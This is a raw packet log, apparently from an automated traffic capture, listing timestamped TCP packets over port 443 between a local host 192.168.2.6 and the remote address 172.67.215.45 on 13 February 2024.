                                                                  Feb 13, 2024 21:13:55.043901920 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.043931961 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.043931961 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044019938 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044034958 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044094086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044094086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044101000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044131994 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044203997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044218063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044290066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044296980 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044680119 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.044955015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.044970036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045002937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045017958 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045051098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045051098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045094967 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045108080 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045156002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045161963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045177937 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045207977 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045789003 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045802116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045855045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045861959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045871973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045909882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.045964956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.045980930 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046032906 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.046040058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046058893 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.046132088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.046623945 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046638966 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046753883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046766996 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.046778917 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.046828032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.046828032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.047544956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.047559023 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.047616959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.047625065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.047889948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.047909021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.047957897 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.047957897 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.047966957 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048506975 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048520088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048583984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048583984 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048583984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048598051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048624992 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048634052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048634052 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048648119 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048686981 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048753023 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048767090 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048823118 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.048829079 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.048911095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.049562931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.049577951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.049628019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.049628019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.049635887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.049671888 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.049962997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.049978018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050132990 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.050139904 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050192118 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.050265074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050278902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050333977 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.050342083 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050381899 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.050915956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.050930023 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051063061 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.051070929 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051134109 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.051163912 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051177979 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051259995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051275969 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.051282883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.051305056 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.051373959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.052084923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052100897 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052153111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.052160025 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052191973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052211046 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052234888 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.052241087 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052270889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.052985907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.052999020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053046942 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053057909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053081036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053097963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053132057 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053132057 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053139925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053646088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053659916 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053694010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053703070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053735971 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053838015 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053858995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.053905010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053905964 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.053915977 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054498911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054512978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054605007 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.054613113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054766893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054783106 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054840088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.054840088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.054848909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054935932 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.054948092 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055016041 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.055016041 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.055023909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055597067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055613995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055656910 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.055664062 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055675983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.055773973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.055787086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056085110 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.056092978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056493044 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056510925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056545019 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.056551933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056569099 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056582928 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056582928 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.056612968 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.056619883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.056766033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.057148933 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.057164907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.057203054 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.057213068 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.057228088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.057269096 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.057282925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.057328939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.057341099 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058056116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058073997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058151960 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058159113 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.058166027 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058177948 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058199883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.058223009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.058243990 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058258057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058304071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.058304071 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.058314085 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.058412075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059107065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059122086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059168100 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059175014 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059206009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059206009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059283972 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059297085 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059350967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059350967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059360981 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059401989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.059932947 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059948921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.059990883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060007095 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060337067 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060367107 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060379028 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060466051 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060472012 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060606003 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060620070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060641050 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060647011 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060669899 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060669899 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060698032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060795069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060807943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060842991 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.060857058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.060945034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.061464071 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061477900 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061539888 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.061549902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061594009 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.061670065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061681986 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061722994 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.061728954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.061758995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.061758995 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.080552101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080574989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080740929 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.080760956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080786943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080806971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080914021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080926895 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.080996037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.080996037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.081002951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081012964 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081032038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081144094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.081151009 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081602097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081617117 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081707954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.081713915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081794977 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081811905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081845045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.081851006 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.081872940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.082205057 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.082220078 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.082282066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.082282066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.082289934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.082472086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.082492113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.082546949 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.082546949 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.082554102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.083791971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.083806038 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.083842993 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.083849907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.083868027 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.084006071 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.084023952 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.084067106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.084073067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.084083080 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085311890 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085326910 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085376978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085380077 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085380077 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085390091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085407972 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085419893 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085457087 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085463047 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.085481882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.085534096 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087167978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087186098 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087244987 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087244987 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087251902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087289095 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087352037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087373018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087416887 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087423086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087479115 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087507010 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087532043 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087574959 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087580919 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087590933 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087613106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087811947 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087829113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.087933064 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.087940931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.088016033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089678049 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089698076 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089730024 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089735985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089757919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089780092 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089857101 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089873075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089904070 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089915037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.089943886 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.089943886 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090152979 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090173006 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090226889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090226889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090234041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090261936 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090348959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090369940 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090429068 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090429068 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.090436935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.090512037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.091922045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.091936111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.091969967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.091975927 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.092004061 CET49701443192.168.2.6172.67.215.45
